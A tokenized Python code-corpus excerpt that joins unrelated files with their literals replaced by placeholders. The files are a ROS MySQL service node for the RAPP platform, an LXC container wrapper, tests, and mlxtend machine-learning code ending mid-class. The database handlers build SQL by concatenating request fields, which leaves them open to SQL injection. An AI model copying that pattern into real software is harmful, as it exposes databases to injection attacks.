fetchDataSrv , self . tblModelFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . 
serv_topic , writeDataSrv , self . tblModelWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblModelDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblModelUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblRappFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . tblRappWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblRappDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblRappUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblRobotFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . 
tblRobotWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblRobotDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblRobotUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblAppsRobotsFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . tblAppsRobotsWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblAppsRobotsDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblAppsRobotsUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblUsersOntologyInstancesFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . 
tblUsersOntologyInstancesWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblUsersOntologyInstancesDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblUsersOntologyInstancesUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . viewUsersRobotsAppsFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , whatRappsCanRunSrv , self . whatRappsCanRunDataHandler ) <EOL> def writeData ( self , req , tblName ) : <EOL> try : <EOL> res = writeDataSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> returncols = self . constructCommaColumns ( req . req_cols ) <EOL> if ( len ( returncols ) > <NUM_LIT:1> ) : <EOL> returncols = "<STR_LIT:(>" + returncols + "<STR_LIT:)>" <EOL> print returncols <EOL> values = "<STR_LIT>" <EOL> for i in range ( len ( req . req_data ) ) : <EOL> if ( i == <NUM_LIT:0> ) : <EOL> values = values + "<STR_LIT:(>" + self . constructCommaColumns ( req . req_data [ i ] . s ) + "<STR_LIT:)>" <EOL> else : <EOL> values = values + "<STR_LIT>" + self . constructCommaColumns ( req . req_data [ i ] . 
s ) + "<STR_LIT:)>" <EOL> query = "<STR_LIT>" + tblName + "<STR_LIT:U+0020>" + returncols + "<STR_LIT>" + values <EOL> cur . execute ( "<STR_LIT>" + tblName + "<STR_LIT>" ) <EOL> cur . execute ( query ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> return res <EOL> def deleteData ( self , req , tblName ) : <EOL> try : <EOL> res = deleteDataSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> where = self . constructAndQuery ( req . where_data ) <EOL> query = "<STR_LIT>" + tblName + where <EOL> cur . execute ( "<STR_LIT>" + tblName + "<STR_LIT>" ) <EOL> cur . execute ( query ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . 
append ( "<STR_LIT>" ) <EOL> return res <EOL> def updateData ( self , req , tblName ) : <EOL> try : <EOL> res = updateDataSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> returncols = self . constructCommaColumns ( req . set_cols ) <EOL> where = self . constructAndQuery ( req . where_data ) <EOL> query = "<STR_LIT>" + tblName + "<STR_LIT>" + returncols + where <EOL> print query <EOL> cur . execute ( "<STR_LIT>" + tblName + "<STR_LIT>" ) <EOL> cur . execute ( query ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> return res <EOL> def fetchData ( self , req , tblName ) : <EOL> try : <EOL> res = fetchDataSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> returncols = self . constructCommaColumns ( req . req_cols ) <EOL> where = self . constructAndQuery ( req . where_data ) <EOL> query = "<STR_LIT>" + returncols + "<STR_LIT>" + tblName + where <EOL> cur . execute ( query ) <EOL> result_set = cur . fetchall ( ) <EOL> for i in range ( len ( result_set ) ) : <EOL> line = StringArrayMsg ( ) <EOL> for j in range ( len ( result_set [ i ] ) ) : <EOL> temp_s = String ( result_set [ i ] [ j ] ) <EOL> line . s . 
append ( ( str ( result_set [ i ] [ j ] ) ) ) <EOL> res . res_data . append ( line ) <EOL> con . close ( ) <EOL> if ( returncols == "<STR_LIT:*>" ) : <EOL> res . res_cols = self . getTableColumnNames ( tblName ) <EOL> else : <EOL> res . res_cols = req . req_cols <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> return res <EOL> def whatRappsCanRun ( self , req , tblName ) : <EOL> try : <EOL> res = whatRappsCanRunSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> query = "<STR_LIT>" + req . model_id + "<STR_LIT>" + req . core_agent_version + "<STR_LIT:'>" ; <EOL> cur . execute ( query ) <EOL> result_set = cur . fetchall ( ) <EOL> for i in range ( len ( result_set ) ) : <EOL> line = StringArrayMsg ( ) <EOL> for j in range ( len ( result_set [ i ] ) ) : <EOL> temp_s = String ( result_set [ i ] [ j ] ) <EOL> line . s . append ( ( str ( result_set [ i ] [ j ] ) ) ) <EOL> res . res_data . append ( line ) <EOL> con . close ( ) <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . 
append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> return res <EOL> def constructCommaColumns ( self , cols ) : <EOL> if ( len ( cols ) < <NUM_LIT:1> ) : <EOL> return "<STR_LIT>" <EOL> elif ( cols [ <NUM_LIT:0> ] == "<STR_LIT:*>" ) : <EOL> return "<STR_LIT:*>" <EOL> else : <EOL> returncols = "<STR_LIT>" <EOL> for i in range ( len ( cols ) ) : <EOL> if i == <NUM_LIT:0> : <EOL> returncols = returncols + cols [ i ] <EOL> else : <EOL> returncols = returncols + "<STR_LIT:U+002C>" + cols [ i ] <EOL> return returncols <EOL> def constructAndQuery ( self , cols ) : <EOL> returnquery = "<STR_LIT>" <EOL> if ( len ( cols ) == <NUM_LIT:0> ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> for i in range ( len ( cols ) ) : <EOL> if i == <NUM_LIT:0> : <EOL> returnquery = returnquery + cols [ i ] . s [ <NUM_LIT:0> ] + "<STR_LIT>" + cols [ i ] . s [ <NUM_LIT:1> ] + "<STR_LIT>" <EOL> else : <EOL> returnquery = returnquery + "<STR_LIT>" + cols [ i ] . s [ <NUM_LIT:0> ] + "<STR_LIT>" + cols [ i ] . s [ <NUM_LIT:1> ] + "<STR_LIT>" <EOL> returnquery = "<STR_LIT>" + returnquery <EOL> return returnquery <EOL> def getTableColumnNames ( self , tblName ) : <EOL> db_username , db_password = self . getLogin ( ) <EOL> try : <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> cur . execute ( "<STR_LIT>" + tblName ) <EOL> result_set = cur . fetchall ( ) <EOL> Columns = [ ] <EOL> for row in result_set : <EOL> Columns = Columns + [ String ( str ( row [ <NUM_LIT:0> ] ) ) ] <EOL> return Columns <EOL> except mdb . Error , e : <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> def getLogin ( self ) : <EOL> fh = open ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> db_username = fh . readline ( ) <EOL> db_username = db_username . 
split ( ) [ <NUM_LIT:0> ] <EOL> db_password = fh . readline ( ) <EOL> db_password = db_password . split ( ) [ <NUM_LIT:0> ] <EOL> return db_username , db_password <EOL> def checkConnection ( self ) : <EOL> try : <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) <EOL> cur = con . cursor ( ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> ver = cur . fetchone ( ) <EOL> print "<STR_LIT>" % ver <EOL> con . close ( ) <EOL> except mdb . Error , e : <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> def tblUserFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUserWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUserDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUserUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblModelFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblModelWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblModelDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblModelUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRappFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . 
fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRappWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRappDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRappUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRobotFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRobotWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRobotDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRobotUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblAppsRobotsFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblAppsRobotsWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblAppsRobotsDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblAppsRobotsUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUsersOntologyInstancesFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . 
fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUsersOntologyInstancesWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUsersOntologyInstancesDeleteDataHandler ( self , req ) : <EOL> res = deleteSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUsersOntologyInstancesUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def viewUsersRobotsAppsFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def whatRappsCanRunDataHandler ( self , req ) : <EOL> res = whatRappsCanRunSrvResponse ( ) <EOL> res = self . whatRappsCanRun ( req , "<STR_LIT>" ) <EOL> return res </s>
<s> import os <EOL> import timeit <EOL> import rospkg <EOL> from os . path import join <EOL> __path__ = os . path . dirname ( os . path . realpath ( __file__ ) ) <EOL> from RappCloud import RappCloud <EOL> class RappInterfaceTest : <EOL> def __init__ ( self ) : <EOL> self . rappCloud = RappCloud ( ) <EOL> rospack = rospkg . RosPack ( ) <EOL> pkgDir = rospack . get_path ( '<STR_LIT>' ) <EOL> self . file_uri = join ( pkgDir , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . valid_results = { <EOL> '<STR_LIT>' : [ { '<STR_LIT:y>' : <NUM_LIT> , '<STR_LIT:x>' : <NUM_LIT> } ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT:error>' : '<STR_LIT>' <EOL> } <EOL> def execute ( self ) : <EOL> start_time = timeit . default_timer ( ) <EOL> response = self . rappCloud . qr_detection ( self . file_uri ) <EOL> end_time = timeit . default_timer ( ) <EOL> self . elapsed_time = end_time - start_time <EOL> return self . validate ( response ) <EOL> def validate ( self , response ) : <EOL> error = response [ '<STR_LIT:error>' ] <EOL> if error != "<STR_LIT>" : <EOL> return [ error , self . elapsed_time ] <EOL> return_data = response <EOL> if self . valid_results == return_data : <EOL> return [ True , self . elapsed_time ] <EOL> else : <EOL> return [ "<STR_LIT>" + str ( return_data ) , self . elapsed_time ] </s>
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup

# Catkin generates the distutils arguments from package.xml metadata;
# setup() just consumes them.
setup_args = generate_distutils_setup(
    packages=['<STR_LIT>'],
    package_dir={'<STR_LIT>': '<STR_LIT:src>'},
)
setup(**setup_args)
<s> """<STR_LIT>""" <EOL> CREATE_CONTAINER = '<STR_LIT>' <EOL> DESTROY_CONTAINER = '<STR_LIT>' <EOL> CONFIGURE_COMPONENT = '<STR_LIT>' <EOL> CONFIGURE_CONNECTION = '<STR_LIT>' <EOL> DATA_MESSAGE = '<STR_LIT>' <EOL> STATUS = '<STR_LIT>' <EOL> ERROR = '<STR_LIT>' <EOL> STATUS_INTERFACE = '<STR_LIT>' </s>
import os
pjoin = os.path.join  # short alias used throughout this module

from twisted.python import log

from rce.util.process import execute

# Template fragments formatted into the generated container config and
# fstab files (actual contents elided in this copy of the source).
_CONFIG_CGROUP = """<STR_LIT>"""
_CONFIG_CAP = """<STR_LIT>"""
_FSTAB_BASE = """<STR_LIT>"""
_FSTAB_BIND = """<STR_LIT>"""


class Container(object):
    """Wrapper around a container: builds its config/fstab files and
    starts/stops it through an external command run on the twisted reactor.
    """

    def __init__(self, reactor, rootfs, conf, hostname):
        """Store paths and validate that *conf* is an absolute, existing
        directory that does not yet contain the config/fstab files.
        """
        self._reactor = reactor
        self._rootfs = rootfs
        self._conf = pjoin(conf, '<STR_LIT>')
        self._fstab = pjoin(conf, '<STR_LIT>')
        self._hostname = hostname
        if not os.path.isabs(conf):
            raise ValueError('<STR_LIT>'
                             '<STR_LIT>')
        if not os.path.isdir(conf):
            raise ValueError('<STR_LIT>'
                             '<STR_LIT>'.format(conf))
        if os.path.exists(self._conf):
            raise ValueError('<STR_LIT>'
                             "<STR_LIT>".format(conf))
        if os.path.exists(self._fstab):
            raise ValueError('<STR_LIT>'
                             "<STR_LIT>".format(conf))
        # Registered network interfaces and extra fstab bind entries.
        self._ifs = []
        self._fstabExt = []

    def addNetworkInterface(self, name, link=None, ip=None, up=None, down=None):
        """Register a network interface; when given, *up*/*down* must be
        absolute paths to existing executable hook scripts.
        """
        if up:
            if not os.path.isabs(up):
                raise ValueError('<STR_LIT>')
            if not os.path.isfile(up):
                raise ValueError('<STR_LIT>')
            if not os.access(up, os.X_OK):
                raise ValueError('<STR_LIT>')
        if down:
            if not os.path.isabs(down):
                raise ValueError('<STR_LIT>')
            if not os.path.isfile(down):
                raise ValueError('<STR_LIT>')
            if not os.access(down, os.X_OK):
                raise ValueError('<STR_LIT>')
        self._ifs.append((name, link, ip, up, down))

    def extendFstab(self, src, fs, ro):
        """Register an extra fstab entry mapping *src* onto *fs* (resolved
        relative to the container rootfs); *ro* selects read-only.
        """
        dst = pjoin(self._rootfs, fs)
        if not os.path.isabs(src):
            raise ValueError('<STR_LIT>')
        if not os.path.exists(src):
            raise ValueError('<STR_LIT>')
        if not os.path.exists(dst):
            raise ValueError('<STR_LIT>')
        self._fstabExt.append((src, dst, ro))

    def _setupFiles(self):
        """Write the container's config and fstab files from the templates,
        the registered interfaces and the extra fstab entries."""
        with open(self._conf, '<STR_LIT:w>') as f:
            f.write('<STR_LIT>'.format(self._hostname))
            f.write('<STR_LIT:\n>')
            f.write('<STR_LIT>'.format(self._rootfs))
            f.write('<STR_LIT>'.format(self._fstab))
            for name, link, ip, up, down in self._ifs:
                f.write('<STR_LIT:\n>')
                f.write('<STR_LIT>')
                f.write('<STR_LIT>')
                f.write('<STR_LIT>'.format(name))
                # Optional per-interface settings are emitted only when set.
                if link:
                    f.write('<STR_LIT>'.format(link))
                if ip:
                    f.write('<STR_LIT>'.format(ip))
                if up:
                    f.write('<STR_LIT>'.format(up))
                if down:
                    f.write('<STR_LIT>'.format(down))
            f.write(_CONFIG_CGROUP)
        with open(self._fstab, '<STR_LIT:w>') as f:
            f.write(_FSTAB_BASE.format(proc=pjoin(self._rootfs, '<STR_LIT>'),
                                       devpts=pjoin(self._rootfs, '<STR_LIT>'),
                                       sysfs=pjoin(self._rootfs, '<STR_LIT>')))
            for src, dst, ro in self._fstabExt:
                f.write(_FSTAB_BIND.format(srcDir=src, dstDir=dst,
                                           ro='<STR_LIT>' if ro else '<STR_LIT>'))

    def start(self, name):
        """Write the config files and launch the container *name*; returns
        the deferred/result of the external command."""
        self._setupFiles()
        log.msg("<STR_LIT>".format(name))
        return execute(('<STR_LIT>', '<STR_LIT>', name, '<STR_LIT>', self._conf,
                        '<STR_LIT>'), reactor=self._reactor)

    def stop(self, name):
        """Stop the container *name* via the external command."""
        log.msg("<STR_LIT>".format(name))
        return execute(('<STR_LIT>', '<STR_LIT>', name), reactor=self._reactor)
<s> from . perceptron import Perceptron <EOL> from . adaline import Adaline <EOL> from . logistic_regression import LogisticRegression <EOL> from . softmax_regression import SoftmaxRegression <EOL> from . neuralnet_mlp import NeuralNetMLP <EOL> from . ensemble_vote import EnsembleVoteClassifier <EOL> from . stacking_classification import StackingClassifier <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] </s>
<s> from mlxtend . data import iris_data <EOL> from mlxtend . data import wine_data <EOL> from mlxtend . data import autompg_data <EOL> from mlxtend . data import mnist_data <EOL> def test_import_wine_data ( ) : <EOL> X , y = wine_data ( ) <EOL> assert ( X . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> assert ( X . shape [ <NUM_LIT:1> ] == <NUM_LIT> ) <EOL> assert ( y . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> def test_import_iris_data ( ) : <EOL> X , y = iris_data ( ) <EOL> assert ( X . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> assert ( X . shape [ <NUM_LIT:1> ] == <NUM_LIT:4> ) <EOL> assert ( y . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> def test_import_autompg_data ( ) : <EOL> X , y = autompg_data ( ) <EOL> assert ( X . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> assert ( X . shape [ <NUM_LIT:1> ] == <NUM_LIT:8> ) <EOL> assert ( y . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) </s>
import numpy as np
import scipy as sp
import scipy.stats
import sys
from copy import deepcopy
from itertools import combinations
from collections import deque
from sklearn.metrics import get_scorer
from sklearn.base import clone
from sklearn.base import BaseEstimator
from sklearn.base import MetaEstimatorMixin
from sklearn.cross_validation import cross_val_score
from ..externals.name_estimators import _name_estimators


class SequentialFeatureSelector(BaseEstimator, MetaEstimatorMixin):
    """Greedy sequential feature selection.

    Grows (forward) or shrinks (backward) a feature subset one feature per
    round, scoring each candidate subset by cross-validation, until exactly
    ``k_features`` are selected.  With ``floating=True`` each round may also
    undo one earlier decision if that improves the score.
    """

    def __init__(self, estimator, k_features,
                 forward=True, floating=False,
                 print_progress=True, scoring='<STR_LIT>',
                 cv=<NUM_LIT:5>, skip_if_stuck=True, n_jobs=<NUM_LIT:1>,
                 pre_dispatch='<STR_LIT>'):
        self.estimator = estimator
        self.k_features = k_features
        self.forward = forward
        self.floating = floating
        self.pre_dispatch = pre_dispatch
        self.scoring = scoring
        # Resolve the scoring name to a callable once, up front.
        self.scorer = get_scorer(scoring)
        self.skip_if_stuck = skip_if_stuck
        self.cv = cv
        self.print_progress = print_progress
        self.n_jobs = n_jobs
        # Auto-generated name -> estimator mapping (single entry).
        self.named_est = {key: value for key, value in
                         _name_estimators([self.estimator])}

    def fit(self, X, y):
        """Run the sequential search on (X, y) and record the best subset
        found for every subset size in ``self.subsets_``."""
        self.est_ = clone(self.estimator)
        if X.shape[<NUM_LIT:1>] < self.k_features:
            raise AttributeError('<STR_LIT>')
        # A 4-slot history of recent subsets is used to detect oscillation;
        # maxlen=0 effectively disables the check.
        if self.skip_if_stuck:
            sdq = deque(maxlen=<NUM_LIT:4>)
        else:
            sdq = deque(maxlen=<NUM_LIT:0>)
        self.subsets_ = {}
        orig_set = set(range(X.shape[<NUM_LIT:1>]))
        # Forward search starts empty; backward starts with all features.
        if self.forward:
